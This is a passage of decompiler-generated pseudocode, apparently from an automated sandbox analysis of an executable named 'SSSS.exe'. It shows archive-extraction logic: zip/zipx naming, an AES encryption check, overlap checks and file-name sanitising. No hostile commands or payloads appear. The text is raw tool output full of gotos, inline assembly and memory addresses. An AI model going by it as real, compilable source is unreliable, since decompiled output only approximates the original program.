											__eflags = _t708;
											if(__eflags > 0) {
												goto L87;
											}
											L78:
											if(__eflags < 0) {
												L80:
												E00EC17CF(0xf10b74, 0xf19f02);
												__eflags =  *(_t730 + 0x50);
												_t569 = 2;
												if( *(_t730 + 0x50) != 0) {
													L86:
													_t569 = 3;
													L216:
													_t337 =  *(_t730 + 0x44) + 1;
													 *(_t730 + 0x44) = _t337;
													__eflags = _t337 -  *(_t730 + 0x60);
													if(_t337 >=  *(_t730 + 0x60)) {
														goto L220;
													}
													_t599 =  *(_t730 - 0x18);
													 *(_t730 + 0x50) = _t599 + _t337;
													 *0xefb588 = _t337 * 0x48 +  *((intOrPtr*)(_t730 - 0x74));
													_t350 = E00EC68A2(_t730 - 0x134);
													__eflags =  *0xf0c82c;
													_t707 =  *0xefb588; // 0x31ef6f0
													 *((intOrPtr*)(_t730 + 0x48)) = _t350;
													if( *0xf0c82c != 0) {
														_t642 = _t707[8];
														__eflags = _t642 -  *0xf0c830; // 0xffffffff
														if(__eflags != 0) {
															__eflags = _t642 - ( *0xf0b650 & 0x0000ffff);
															if(__eflags != 0) {
																E00EC8049(__eflags, 0xf19f02, 0x800, _t642);
															} else {
																_t481 = E00EC800E(0xf19f02);
																__eflags = _t481;
																_t482 = L"zipx";
																if(_t481 == 0) {
																	_t482 = L"zip";
																}
																E00EC373A(0xf19f02, _t482, 0x800);
															}
															_t474 =  *0xefb588; // 0x31ef6f0
															_t680 =  *0xf0b5b8; // 0x0
															 *0xf0c830 = _t474[8];
															__eflags = _t680;
															if(_t680 != 0) {
																 *0xee7220(1);
																_t642 = _t680;
																 *((intOrPtr*)( *((intOrPtr*)( *_t680))))();
															}
															__eflags = 0;
															 *0xf0b5b8 = 0;
															E00EC9F9D(_t642, 0);
															_t707 =  *0xefb588; // 0x31ef6f0
														}
													}
													_t675 =  *_t707 +  *0xf0b5e0;
													_t708 = _t707[1];
													asm("adc esi, [0xf0b5e4]");
													_t352 = E00ED3930(_t675, _t708, 0x2000, 0);
													 *(_t730 + 0x68) = _t352;
													_t603 = _t675 - _t352;
													_t353 = _t708;
													asm("sbb eax, edx");
													_t659 = 0;
													 *(_t730 + 0x58) = _t353;
													__eflags = _t708;
													if(__eflags > 0) {
														goto L87;
													}
												}
												_t639 =  *0xf0b5e0; // 0x0
												_t659 =  *0xf0b5e4; // 0x0
												__eflags = _t639 | _t659;
												if((_t639 | _t659) == 0) {
													goto L86;
												}
												_t470 =  *0xefb588; // 0x31ef6f0
												 *(_t730 + 0x38) = _t659;
												 *0xf0b5e0 = 0;
												 *0xf0b5e4 = 0;
												_t722 = _t470[1];
												 *(_t730 + 0x3c) = _t639;
												 *(_t730 + 0x6c) =  *_t470;
												_t676 = E00ED3930( *_t470, _t722, 0x2000, 0);
												_t603 =  *(_t730 + 0x6c) - _t676;
												 *(_t730 + 0x68) = _t676;
												_t353 = _t722;
												asm("sbb eax, edx");
												_t659 = 0;
												 *(_t730 + 0x58) = _t353;
												__eflags = _t722;
												if(__eflags > 0) {
													L88:
													__eflags = _t603 -  *0xf0b5d8; // 0x78e000
													if(__eflags != 0) {
														L92:
														_t677 =  *0xf0b5b8; // 0x0
														 *0xee7220();
														 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 0x10))))();
														_t678 =  *0xf0b5b8; // 0x0
														 *0xee7220();
														 *0xf0b5d8 =  *((intOrPtr*)( *((intOrPtr*)( *_t678 + 0x14))))();
														 *0xf0b5dc = _t659;
														_t360 = E00ECA505(_t659,  *0xf0b594, 0x2000, _t603,  *(_t730 + 0x58), _t659);
														asm("cdq");
														_t608 = _t360;
														_t711 = _t659;
														 *0xf0b5a0 = _t608;
														 *0xf0b5a4 = _t711;
														__eflags = _t711;
														if(__eflags > 0) {
															L95:
															_t362 =  *0xf0b594; // 0x0
															 *0xf0b598 = _t362 +  *(_t730 + 0x68);
															asm("cdq");
															_t609 = _t608 -  *(_t730 + 0x68);
															__eflags = _t609;
															 *0xf0b5a0 = _t609;
															asm("sbb esi, edx");
															 *0xf0b5a4 = _t711;
															L96:
															_t365 = E00ECA0EE(0xefb580, 4);
															__eflags = _t365;
															if(_t365 == 0) {
																L85:
																E00EC17CF(0xf10b74, 0xf19f02);
																goto L86;
															}
															_t368 = E00EC99A7(0xefb580);
															__eflags = _t368;
															if(_t368 != 0) {
																L107:
																_t712 = E00ECC8D8(_t609);
																__eflags = _t712;
																if(_t712 == 0) {
																	_push(0);
																	_push(0xf0b5f2);
																	 *0xf0b6a4 = 0;
																	_push(2);
																	_push( *0xf0b610 & 0x0000ffff);
																	_t372 = E00EC9CDA(_t659);
																	__eflags = _t372;
																	if(_t372 == 0) {
																		L115:
																		_t373 =  *0xf0b5e8; // 0x0
																		__eflags = _t373;
																		if(_t373 == 0) {
																			_t374 = 0;
																			__eflags = 0;
																		} else {
																			L00ED869E(_t373);
																			_t374 = 0;
																			 *0xf0b5e8 = 0;
																		}
																		_push(_t374);
																		_push(_t374);
																		_push(3);
																		_push( *0xf0b612 & 0x0000ffff);
																		_t376 = E00EC9CDA(_t659);
																		__eflags = _t376;
																		if(_t376 == 0) {
																			L122:
																			E00ECC3C7(_t659,  *0xf0b5e8,  *0xf0b612 & 0x0000ffff, 1);
																			_push(0x3000);
																			_t381 = E00EC97BF( *0xf0b5e8,  *0xf0b612 & 0x0000ffff,  *0xf0c6a4, _t730 - 0x6490);
																			__eflags = _t381;
																			if(_t381 != 0) {
																				E00ECDA9E(_t730 - 0x6490, 0xf0b6a4, 0x800);
																				E00EC37A4(0xf0b6a4, 0xf0b6a4, 0x800);
																			}
																			_t611 =  *0xefb588; // 0x31ef6f0
																			_push(0xf0c6b8);
																			_push(0xf0c6b0);
																			_push(0xf0c6a8);
																			 *0xf0c6a8 = _t611[0xa];
																			 *0xf0c6ac = _t611[0xb];
																			 *0xf0c6b0 = _t611[0xc];
																			 *0xf0c6b4 = _t611[0xd];
																			 *0xf0c6b8 = _t611[0xe];
																			 *0xf0c6bc = _t611[0xf];
																			_push( *0xf0b612 & 0x0000ffff);
																			_push( *0xf0b5e8);
																			E00EC9651(_t659);
																			E00EC9855( *0xf0b5e8,  *0xf0b612 & 0x0000ffff, 0xf0b5f4);
																			E00EC674F(0xf0b6a4,  *((intOrPtr*)(_t730 + 0x48)), 0x800);
																			_t612 =  *0xefb588; // 0x31ef6f0
																			_t144 =  &(_t612[9]); // 0x31ef714
																			_t394 = E00ECDADA(__eflags, 0xf0b6a4, _t612[7], _t612[4], _t612[5], _t144);
																			__eflags =  *0xf0b6a4;
																			 *((char*)(_t730 + 0x73)) = _t394;
																			if( *0xf0b6a4 == 0) {
																				L131:
																				_push(0x800);
																				_push(0xf0b6a4);
																				_push(0xf0b6a4);
																				E00EC30A2();
																				__eflags =  *((char*)(_t730 + 0x73));
																				if( *((char*)(_t730 + 0x73)) == 0) {
																					_t613 =  *0xefb558; // 0x0
																				} else {
																					_t613 = 0;
																				}
																				asm("cdq");
																				 *(_t730 + 0x68) = _t659;
																				asm("cdq");
																				_push(0);
																				asm("adc eax, edx");
																				asm("adc eax, esi");
																				_t685 = ( *0xf0b612 & 0x0000ffff) + ( *0xf0b610 & 0x0000ffff) + _t613 + 0x1e;
																				 *((intOrPtr*)(_t730 + 0x48)) = _t685;
																				asm("adc eax, ecx");
																				_t615 =  *(_t730 + 0x10);
																				__eflags = (_t615 &  *(_t730 + 0x2c)) - 0xffffffff;
																				_t401 =  *0xefb588; // 0x31ef6f0
																				if((_t615 &  *(_t730 + 0x2c)) == 0xffffffff) {
																					L170:
																					_t660 =  *_t401;
																					_t715 = _t401[1];
																					 *(_t730 + 0x5c) = _t660;
																					 *(_t730 + 0x54) = _t715;
																					asm("adc esi, ecx");
																					 *(_t730 + 0x30) =  *(_t730 + 0x68);
																					_t617 =  *0xf16de9;
																					 *((intOrPtr*)(_t730 + 0x34)) = _t685;
																					 *(_t730 + 0x10) = _t660 + _t685;
																					 *(_t730 + 0x2c) = _t715;
																					 *(_t730 - 0x28) = _t401[8];
																					__eflags = _t617;
																					if(_t617 == 0) {
																						L173:
																						_t403 = 0;
																						__eflags = 0;
																						L174:
																						_t659 = 0;
																						__eflags = _t617;
																						_t406 = L00EC7752(_t617, 0xf0b6a4, (_t403 & 0xffffff00 | _t617 == 0x00000000) & 0x000000ff, _t403, 0); // executed
																						__eflags = _t406;
																						if(_t406 == 0) {
																							goto L220;
																						}
																						__eflags =  *0xf16de9;
																						if( *0xf16de9 == 0) {
																							__eflags =  *((char*)(_t730 + 0x73));
																							if(__eflags == 0) {
																								_t407 = E00EC9B15(0, __eflags, 0xf0b6a4);
																								__eflags = _t407 - 0xffffffff;
																								if(_t407 == 0xffffffff) {
																									__eflags =  *0xf16d43;
																									L204:
																									if(__eflags != 0) {
																										goto L216;
																									}
																									L205:
																									_t408 =  *0xefb588; // 0x31ef6f0
																									__eflags = _t408[0x10] & 0x00000001;
																									if(__eflags == 0) {
																										L213:
																										_t409 = E00EC9199(_t659, 0xf0b6a4);
																										__eflags = _t409;
																										if(_t409 != 0) {
																											__eflags = _t409 - _t569;
																											if(_t409 > _t569) {
																												_t569 = _t409;
																											}
																										}
																										goto L216;
																									}
																									_t410 = E00ECCD25(_t659, __eflags);
																									__eflags = _t410;
																									if(_t410 == 0) {
																										goto L213;
																									}
																									__eflags = _t410 - 9;
																									if(_t410 == 9) {
																										E00EC179A(_t730 - 0x180, 2);
																										E00EC721D(_t730 - 0x180);
																										goto L223;
																									}
																									__eflags = _t410 - 0xc;
																									if(__eflags != 0) {
																										__eflags = _t410 - _t569;
																										if(__eflags > 0) {
																											_t569 = _t410;
																										}
																										_push(0xf0b6a4);
																										goto L114;
																									}
																									E00EC173F(__eflags, 6, 0xf19f02, 0xf0b6a4);
																									 *(_t730 + 0x20) =  *(_t730 + 0x20) + 1;
																									goto L216;
																								}
																								__eflags = _t407;
																								if(_t407 == 0) {
																									_t415 =  *0xf16d20;
																									__eflags = _t415 - 2;
																									if(_t415 == 2) {
																										goto L216;
																									}
																									L198:
																									__eflags = _t415;
																									if(_t415 == 0) {
																										L200:
																										 *(_t730 + 0x18) = 0;
																										 *((intOrPtr*)(_t730 + 0x1c)) = 0;
																										E00EC7046((( *0xf0b5f8 & 0x0000ffff) << 0x10) + ( *0xf0b5f6 & 0x0000ffff));
																										_push(0);
																										_t421 = E00EC75C1(0xf10bf0, 0xf0b6a4, 0x800,  *0xefb560,  *0xefb564, _t730 + 0x18);
																										__eflags = _t421 - 6;
																										if(_t421 == 6) {
																											goto L219;
																										}
																										__eflags = _t421 - 1;
																										if(_t421 == 1) {
																											goto L216;
																										}
																										goto L205;
																									}
																									__eflags = _t415 - 3;
																									if(_t415 != 3) {
																										goto L205;
																									}
																									goto L200;
																								}
																								__eflags = _t407 - 1;
																								if(_t407 != 1) {
																									goto L205;
																								}
																								_t415 =  *0xf16d20;
																								__eflags = _t415 - 2;
																								if(_t415 == 2) {
																									goto L216;
																								}
																								__eflags =  *0xf16d44;
																								if( *0xf16d44 != 0) {
																									goto L216;
																								}
																								__eflags =  *0xf16d43;
																								if( *0xf16d43 != 0) {
																									goto L216;
																								}
																								goto L198;
																							}
																							__eflags =  *0xf16d43;
																							if( *0xf16d43 != 0) {
																								goto L216;
																							}
																							__eflags =  *0xf0b6a4;
																							if( *0xf0b6a4 == 0) {
																								goto L216;
																							}
																							__eflags =  *0xf16d48 - 1;
																							if( *0xf16d48 == 1) {
																								goto L216;
																							}
																							_t716 = 0;
																							_t423 =  *0xefb588; // 0x31ef6f0
																							__eflags = _t423[7];
																							if(_t423[7] == 0) {
																								L183:
																								_t716 = _t423[9];
																								L184:
																								_t424 = E00EC2520(0xf0b6a4);
																								__eflags = _t424;
																								if(_t424 != 0) {
																									L189:
																									E00EC6866(_t730 - 0xd4, _t659, 0xf0b6a4);
																									_push( *0xf0c6ac);
																									E00EC80D4(_t730 - 0x3c,  *0xf0c6a8);
																									_push( *0xf0c6bc);
																									E00EC80D4(_t730 - 0x3c,  *0xf0c6b8);
																									_push( *0xf0c6b4);
																									E00EC80D4(_t730 - 0x3c,  *0xf0c6b0);
																									goto L216;
																								}
																								__eflags =  *0xf16d90 - _t424;
																								_t431 = E00EC25B6(_t617,  *0xf16d90 - _t424, 0xf0b6a4, (_t424 & 0xffffff00 |  *0xf16d90 == _t424) & 0x000000ff, _t716);
																								__eflags = _t431;
																								if(_t431 == 0) {
																									L188:
																									 *0xefb578 =  *0xefb578 + 1;
																									__eflags =  *0xefb578;
																									goto L189;
																								}
																								_push(1);
																								_push(0xf0b6a4);
																								_t432 = E00EC23EF(_t617, _t730);
																								__eflags =  *0xf16d90;
																								__eflags = E00EC25B6(_t617,  *0xf16d90, 0xf0b6a4, (_t432 & 0xffffff00 |  *0xf16d90 == 0x00000000) & 0x000000ff, _t716);
																								if(__eflags == 0) {
																									goto L188;
																								}
																								E00ED3340(E00EC173F(__eflags, 0x14, 0xf19f02, 0xf0b6a4));
																								goto L216;
																							}
																							__eflags = _t423[7] - 0xb;
																							if(_t423[7] != 0xb) {
																								goto L184;
																							}
																							goto L183;
																						}
																						__eflags =  *((char*)(_t730 + 0x73));
																						goto L204;
																					}
																					_t438 = 0x49;
																					__eflags =  *0xf18ee2 - _t438;
																					if( *0xf18ee2 == _t438) {
																						goto L173;
																					}
																					_t403 = 1;
																					goto L174;
																				} else {
																					__eflags =  *(_t730 - 0x28) - _t401[8];
																					if( *(_t730 - 0x28) != _t401[8]) {
																						goto L170;
																					}
																					_t717 = _t401[1];
																					_t659 =  *_t401;
																					 *(_t730 + 8) = _t659;
																					 *(_t730 + 0x58) = _t717;
																					__eflags = _t717 -  *(_t730 + 0x2c);
																					if(__eflags > 0) {
																						goto L170;
																					}
																					if(__eflags < 0) {
																						L139:
																						_t439 =  *(_t730 + 0x5c);
																						 *((intOrPtr*)(_t730 - 0x58)) = _t685;
																						 *(_t730 - 0x54) =  *(_t730 + 0x68);
																						 *(_t730 - 0x60) = _t659;
																						 *(_t730 - 0x5c) = _t717;
																						__eflags =  *(_t730 + 0x54) - _t717;
																						if(__eflags > 0) {
																							L146:
																							_t690 = _t659 +  *((intOrPtr*)(_t730 + 0x48));
																							asm("adc esi, [ebp+0x68]");
																							 *(_t730 + 0xc) = _t717;
																							__eflags =  *(_t730 + 0x54) - _t717;
																							if(__eflags > 0) {
																								L152:
																								_t440 = 0;
																								 *(_t730 + 0x6c) = 0;
																								__eflags =  *(_t730 - 0x4c);
																								if( *(_t730 - 0x4c) <= 0) {
																									L169:
																									_t732 = _t732 - 0x10;
																									asm("movsd");
																									asm("movsd");
																									asm("movsd");
																									asm("movsd");
																									E00EC80AF(_t730 - 0x50);
																									_t401 =  *0xefb588; // 0x31ef6f0
																									_t685 =  *((intOrPtr*)(_t730 + 0x48));
																									goto L170;
																								}
																								_t630 =  *((intOrPtr*)(_t730 - 0x50));
																								do {
																									_t719 =  *((intOrPtr*)(_t630 + 4));
																									__eflags = _t719 -  *(_t730 + 0x58);
																									if(__eflags > 0) {
																										L161:
																										__eflags = _t719 -  *(_t730 + 0xc);
																										if(__eflags > 0) {
																											goto L168;
																										}
																										if(__eflags < 0) {
																											L164:
																											_t659 =  *((intOrPtr*)(_t630 + 8)) +  *_t630;
																											asm("adc eax, esi");
																											__eflags =  *((intOrPtr*)(_t630 + 0xc)) -  *(_t730 + 0xc);
																											if(__eflags > 0) {
																												L218:
																												E00EC173F(__eflags, 0x1c, 0xf19f02, "SSSS.exe");
																												_t569 = 3;
																												L219:
																												 *(_t730 + 0x64) = 1;
																												goto L220;
																											}
																											if(__eflags < 0) {
																												L167:
																												_t440 =  *(_t730 + 0x6c);
																												goto L168;
																											}
																											__eflags = _t659 - _t690;
																											if(__eflags >= 0) {
																												goto L218;
																											}
																											goto L167;
																										}
																										__eflags =  *_t630 - _t690;
																										if( *_t630 >= _t690) {
																											goto L168;
																										}
																										goto L164;
																									}
																									if(__eflags < 0) {
																										L157:
																										_t659 =  *((intOrPtr*)(_t630 + 8)) +  *_t630;
																										asm("adc eax, esi");
																										__eflags =  *((intOrPtr*)(_t630 + 0xc)) -  *(_t730 + 0x58);
																										if(__eflags > 0) {
																											goto L218;
																										}
																										if(__eflags < 0) {
																											L160:
																											_t440 =  *(_t730 + 0x6c);
																											goto L161;
																										}
																										__eflags = _t659 -  *(_t730 + 8);
																										if(__eflags > 0) {
																											goto L218;
																										}
																										goto L160;
																									}
																									__eflags =  *_t630 - _t659;
																									if( *_t630 > _t659) {
																										goto L161;
																									}
																									goto L157;
																									L168:
																									_t659 =  *(_t730 + 8);
																									_t440 = _t440 + 1;
																									_t630 = _t630 + 0x10;
																									 *(_t730 + 0x6c) = _t440;
																									__eflags = _t440 -  *(_t730 - 0x4c);
																								} while (_t440 <  *(_t730 - 0x4c));
																								goto L169;
																							}
																							if(__eflags < 0) {
																								L149:
																								_t632 =  *((intOrPtr*)(_t730 + 0x34)) + _t439;
																								asm("adc eax, [ebp+0x54]");
																								__eflags =  *(_t730 + 0x30) - _t717;
																								if(__eflags > 0) {
																									goto L218;
																								}
																								if(__eflags < 0) {
																									goto L152;
																								}
																								__eflags = _t632 - _t690;
																								if(__eflags >= 0) {
																									goto L218;
																								}
																								goto L152;
																							}
																							__eflags = _t439 - _t690;
																							if(_t439 >= _t690) {
																								goto L152;
																							}
																							goto L149;
																						}
																						if(__eflags < 0) {
																							L142:
																							_t634 =  *((intOrPtr*)(_t730 + 0x34)) + _t439;
																							asm("adc eax, edi");
																							__eflags =  *(_t730 + 0x30) - _t717;
																							if(__eflags > 0) {
																								goto L218;
																							}
																							if(__eflags < 0) {
																								L145:
																								_t439 =  *(_t730 + 0x5c);
																								goto L146;
																							}
																							__eflags = _t634 - _t659;
																							if(__eflags > 0) {
																								goto L218;
																							}
																							goto L145;
																						}
																						__eflags = _t439 - _t659;
																						if(_t439 > _t659) {
																							goto L146;
																						}
																						goto L142;
																					}
																					__eflags = _t659 - _t615;
																					if(_t659 >= _t615) {
																						goto L170;
																					}
																					goto L139;
																				}
																			} else {
																				__eflags =  *0xf0b6a6;
																				if( *0xf0b6a6 == 0) {
																					goto L131;
																				}
																				__eflags =  *0xf0b6a8;
																				_t448 = 0xf0b6a8;
																				if( *0xf0b6a8 == 0) {
																					goto L131;
																				}
																				_t659 = 0;
																				__eflags = 0;
																				do {
																					__eflags =  *_t448 - 0x3a;
																					if( *_t448 == 0x3a) {
																						_t635 = 0x5f;
																						 *_t448 = _t635;
																					}
																					_t448 = _t448 + 2;
																					__eflags =  *_t448 - _t659;
																				} while ( *_t448 != _t659);
																				goto L131;
																			}
																		} else {
																			__eflags = _t376 - _t569;
																			if(_t376 > _t569) {
																				_t569 = _t376;
																			}
																			__eflags = _t376 - 1;
																			if(__eflags > 0) {
																				L113:
																				_push("SSSS.exe");
																				L114:
																				_push(0xf19f02);
																				_push(0x1c);
																				E00EC173F(__eflags);
																				goto L216;
																			} else {
																				goto L122;
																			}
																		}
																	}
																	__eflags = _t372 - _t569;
																	if(_t372 > _t569) {
																		_t569 = _t372;
																	}
																	__eflags = _t372 - 1;
																	if(__eflags <= 0) {
																		goto L115;
																	} else {
																		goto L113;
																	}
																}
																E00EC17CF(0xf10b74, 0xf19f02);
																_t569 = _t712;
																goto L216;
															}
															__eflags =  *(_t730 + 0x50);
															_t659 =  *0xf0b5e4; // 0x0
															_t609 =  *0xf0b5e0; // 0x0
															if( *(_t730 + 0x50) != 0) {
																L101:
																_t609 = _t609 | _t659;
																__eflags = _t609;
																if(_t609 != 0) {
																	goto L85;
																}
																_t721 =  *(_t730 + 0x3c);
																_t692 =  *(_t730 + 0x38);
																__eflags = _t721 | _t692;
																if((_t721 | _t692) == 0) {
																	goto L85;
																}
																 *0xf0b5e0 = _t721;
																 *0xf0b5e4 = _t692;
																L104:
																_t456 =  *0xefb588; // 0x31ef6f0
																_push(_t456[1]);
																_t457 = E00ECA32E(_t659,  *_t456);
																__eflags = _t457;
																if(_t457 != 0) {
																	goto L85;
																}
																_t458 = E00ECA0EE(0xefb580, 4);
																__eflags = _t458;
																if(_t458 == 0) {
																	goto L85;
																}
																_t459 = E00EC99A7(0xefb580);
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L85;
																}
																goto L107;
															}
															__eflags = _t609 | _t659;
															if((_t609 | _t659) == 0) {
																goto L101;
															}
															 *(_t730 + 0x3c) = _t609;
															 *(_t730 + 0x38) = _t659;
															 *0xf0b5e0 = 0;
															 *0xf0b5e4 = 0;
															goto L104;
														}
														if(__eflags < 0) {
															goto L85;
														}
														__eflags = _t608;
														if(_t608 <= 0) {
															goto L85;
														}
														goto L95;
													}
													__eflags = _t353 -  *0xf0b5dc; // 0x0
													if(__eflags != 0) {
														goto L92;
													}
													__eflags =  *0xf0c82c;
													if( *0xf0c82c != 0) {
														goto L92;
													}
													_t463 =  *0xf0b598; // 0x31dc72d
													_t609 =  *0xf0b594; // 0x0
													asm("cdq");
													 *0xf0b5a0 =  *0xf0b5a0 + _t463 - _t676 - _t609;
													asm("adc [0xf0b5a4], edx");
													 *0xf0b598 = _t676 + _t609;
													goto L96;
												}
												if(__eflags < 0) {
													goto L85;
												}
												__eflags =  *(_t730 + 0x6c);
												if( *(_t730 + 0x6c) >= 0) {
													goto L88;
												}
												goto L85;
											}
											__eflags = _t675;
											if(_t675 >= 0) {
												goto L87;
											}
											goto L80;
											L87:
											_t676 =  *(_t730 + 0x68);
											goto L88;
										}
									}
								}
								__eflags =  *0xf0c834 - _t500; // 0x0
								if(__eflags == 0) {
									L52:
									 *(_t730 + 0x24) = 1;
									L53:
									_t592 = 0;
									goto L55;
								}
								_t501 = E00EC995D(0xefb580);
								__eflags = _t501;
								if(_t501 != 0) {
									goto L54;
								}
								goto L52;
							}
							__eflags = _t645 - 0xffff;
							if(_t645 != 0xffff) {
								L48:
								E00EC17CF(0xf10b74, 0xf19f02);
								_t569 = 3;
								goto L53;
							}
							__eflags =  *0xf0b664 - _t659; // 0x0
							if(__eflags == 0) {
								goto L49;
							}
							goto L48;
						}
						_t503 = E00ECC761(_t591);
						if(_t503 != 0) {
							_t569 = _t503;
							goto L57;
						}
						 *0xf0b6a4 = _t503;
						_push( *0xf0b619 & 0x000000ff);
						_push(0xf0b61c);
						_push(2);
						_push( *0xf0b638 & 0x0000ffff);
						_t506 = E00EC9CDA(_t659);
						if(_t506 == 0) {
							L14:
							_push(0);
							_push(0);
							_push(3);
							_push( *0xf0b63a & 0x0000ffff);
							_t509 = E00EC9CDA(_t659);
							if(_t509 == 0) {
								L18:
								E00ECC3C7(_t659,  *0xf0b5e8,  *0xf0b63a & 0x0000ffff, 0);
								E00EC9855( *0xf0b5e8,  *0xf0b63a & 0x0000ffff, 0xf0b61e);
								_push(0);
								_push(0);
								_push(0);
								_push( *0xf0b63c & 0x0000ffff);
								_t517 = E00EC9CDA(_t659);
								if(_t517 == 0) {
									L22:
									_push(0x3000);
									if(E00EC97BF( *0xf0b5e8,  *0xf0b63a & 0x0000ffff,  *0xf0c6a4, _t730 - 0x6490) != 0) {
										E00ECDA9E(_t730 - 0x6490, 0xf0b6a4, 0x800);
										E00EC37A4(0xf0b6a4, 0xf0b6a4, 0x800);
									}
									E00EC7046(( *0xf0b622 & 0x0000ffff) << 0x00000010 |  *0xf0b620 & 0x0000ffff);
									_t523 =  *0xefb588; // 0x31ef6f0
									_t523[0xc] = 0;
									_t523[0xd] = 0;
									_t524 =  *0xefb588; // 0x31ef6f0
									_t524[0xe] = 0;
									_t524[0xf] = 0;
									_t653 =  *0xefb588; // 0x31ef6f0
									_t52 =  &(_t653[0xe]); // 0x31ef728
									_t53 =  &(_t653[0xc]); // 0x31ef720
									_t54 =  &(_t653[0xa]); // 0x31ef718
									_push( *0xf0b63a & 0x0000ffff);
									_push( *0xf0b5e8);
									E00EC9651(_t659);
									_t726 =  *0xf0b63a & 0x0000ffff;
									_t695 =  *0xf0b5e8; // 0x0
									if(_t726 == 0 || _t695 == 0) {
										L26:
										 *((char*)(_t730 + 0x73)) = 0;
										goto L27;
									} else {
										while(1) {
											__eflags = _t726 - 4;
											if(_t726 < 4) {
												break;
											}
											 *(_t730 + 0x44) = E00EC9F88(_t695) & 0x0000ffff;
											_t76 = _t695 + 2; // 0x2
											_t658 = E00EC9F88(_t76) & 0x0000ffff;
											__eflags = _t658 - _t726 - 4;
											if(_t658 > _t726 - 4) {
												goto L26;
											}
											__eflags =  *(_t730 + 0x44) - 0x17;
											if(__eflags == 0) {
												 *((char*)(_t730 + 0x73)) = 1;
												E00EC7BFF(__eflags, 0x22, 0xf19f02, "SSSS.exe", L"AES-0017");
												L27:
												E00EC7C78();
												 *((char*)(_t730 - 4)) = 5;
												E00ED4440(_t695, _t730 - 0x2490, 0, 0x2310);
												_t732 = _t732 + 0xc;
												E00EC674F(_t730 - 0x2468, "SSSS.exe", 0x800);
												_t727 = E00EC36A8(0, _t730 - 0x2468);
												if(_t727 > _t730 - 0x2468 && E00EC358A( *_t727 & 0x0000ffff) != 0) {
													 *_t727 = 0;
												}
												_t655 =  *0xefb588; // 0x31ef6f0
												 *(_t730 - 0x1450) = _t655[0xa];
												 *(_t730 - 0x144c) = _t655[0xb];
												_t542 =  *0xf0b630; // 0x4b400
												 *((intOrPtr*)(_t730 - 0x1430)) = _t542;
												_t543 =  *0xf0b634; // 0x0
												 *((intOrPtr*)(_t730 - 0x142c)) = _t543;
												if( *((char*)(_t730 + 0x73)) != 0 || E00EC14F1(_t730 - 0x2490, 0, 6, 0, 0, 0) == 0) {
													L41:
													_t703 =  *(_t730 + 0x6c);
													_t671 =  *(_t730 + 0x60);
													goto L42;
												} else {
													if(E00EC9A09() == 0) {
														_t80 = _t730 + 0x4c;
														 *_t80 =  *(_t730 + 0x4c) + 1;
														__eflags =  *_t80;
														goto L41;
													}
													E00EC6866(_t730 - 0x134, _t659, "SSSS.exe");
													_t671 =  *(_t730 + 0x60) + 1;
													_t703 =  *(_t730 + 0x6c) + 0x48;
													 *(_t730 + 0x60) = _t671;
													 *(_t730 + 0x6c) = _t703;
													L42:
													 *(_t730 + 0x40) =  *(_t730 + 0x40) + 1;
													_t591 = _t730 - 0x1468;
													_push(0);
													asm("adc [ebp+0x14], eax");
													 *((char*)(_t730 - 4)) = 4;
													E00EC62E5(_t730 - 0x1468);
													goto L3;
												}
											}
											_t562 = 0xfffffffc;
											_t695 = _t695 + 4 + _t658;
											_t726 = _t726 + _t562 - _t658;
											__eflags = _t726;
										}
										goto L26;
									}
								}
								if(_t517 > _t569) {
									_t569 = _t517;
								}
								if(_t517 > 1) {
									goto L43;
								}
								goto L22;
							} else {
								if(_t509 > _t569) {
									_t569 = _t509;
								}
								if(_t509 > 1) {
									goto L43;
								}
								goto L18;
							}
						} else {
							if(_t506 > _t569) {
								_t569 = _t506;
							}
							if(_t506 > 1) {
								L43:
								E00EC173F(__eflags, 0x1c, 0xf19f02, "SSSS.exe");
								goto L57;
							}
							goto L14;
						}
					}
					_t592 = 0;
					__eflags = 0;
					goto L59;
				}
				L223:
				_t295 = E00EC68F2(_t730 - 0xd4, _t730 - 0x3490, 0x800);
				__eflags = _t295;
				if(_t295 == 0) {
					L226:
					_t296 = E00EC772D();
					__eflags = _t296;
					if(_t296 == 0) {
						__eflags =  *(_t730 + 0x24);
						if( *(_t730 + 0x24) != 0) {
							__eflags =  *0xf0c82c - _t296; // 0x0
							if(__eflags == 0) {
								E00EC17CF(0xf10b74, 0xf19f02);
								__eflags = _t569;
								if(_t569 == 0) {
									_t569 = _t569 + 1;
									__eflags = _t569;
								}
							}
						}
					}
					_t669 =  *(_t730 + 0x50) + 1;
					__eflags =  *0xefb578;
					if( *0xefb578 == 0) {
						_t306 = 0x49;
						__eflags =  *0xf18ee2 - _t306;
						if(__eflags != 0) {
							E00EC170E(__eflags, 0x44, 0xf19f02);
							E00EC199D(0xf10b74, 0xa);
						}
					}
					__eflags = _t669;
					if(_t669 != 0) {
						L237:
						_t577 =  *(_t730 + 0x20);
						__eflags = _t669 - (_t577 & 0x0000ffff);
						if(_t669 != (_t577 & 0x0000ffff)) {
							L240:
							__eflags =  *(_t730 + 0x4c);
							if( *(_t730 + 0x4c) == 0) {
								L244:
								__eflags = _t577;
								if(_t577 != 0) {
									__eflags = _t569;
									if(_t569 == 0) {
										_t569 = _t569 + 1;
										__eflags = _t569;
									}
								}
								goto L247;
							}
							__eflags = _t569 - 1;
							if(_t569 > 1) {
								goto L244;
							}
							_push(0x51);
							L243:
							_pop(_t569);
							goto L247;
						}
						__eflags = _t569 - 1;
						if(_t569 > 1) {
							goto L240;
						}
						_push(0x52);
						goto L243;
					} else {
						__eflags = _t569 - 1;
						if(_t569 > 1) {
							goto L237;
						}
						__eflags = 0 -  *(_t730 + 0x4c);
						asm("sbb ebx, ebx");
						_t569 = (_t569 & 0x00000046) + 0xb;
						L247:
						E00EC12CC(_t730 - 0xd4);
						E00EC7D58(_t730 - 0x3c);
						E00EC12CC(_t730 - 0x134);
						E00EC7D0F(_t730 - 0x74);
						E00EC7CC4(_t730 - 0x50);
						 *[fs:0x0] =  *((intOrPtr*)(_t730 - 0xc));
						return _t569;
					}
				}
				_t702 =  *((intOrPtr*)(_t730 - 0x3c)) + 0x10;
				__eflags = _t702;
				do {
					 *_t730 =  *((intOrPtr*)(_t702 - 0x10));
					 *(_t730 + 4) =  *(_t702 - 0xc);
					 *(_t730 - 0x14) =  *((intOrPtr*)(_t702 - 8));
					 *(_t730 - 0x10) =  *(_t702 - 4);
					 *(_t730 + 0x18) =  *_t702;
					 *((intOrPtr*)(_t730 + 0x1c)) =  *((intOrPtr*)(_t702 + 4));
					asm("sbb eax, eax");
					_push( ~( *0xf17ec0) & _t730 + 0x00000018);
					asm("sbb eax, eax");
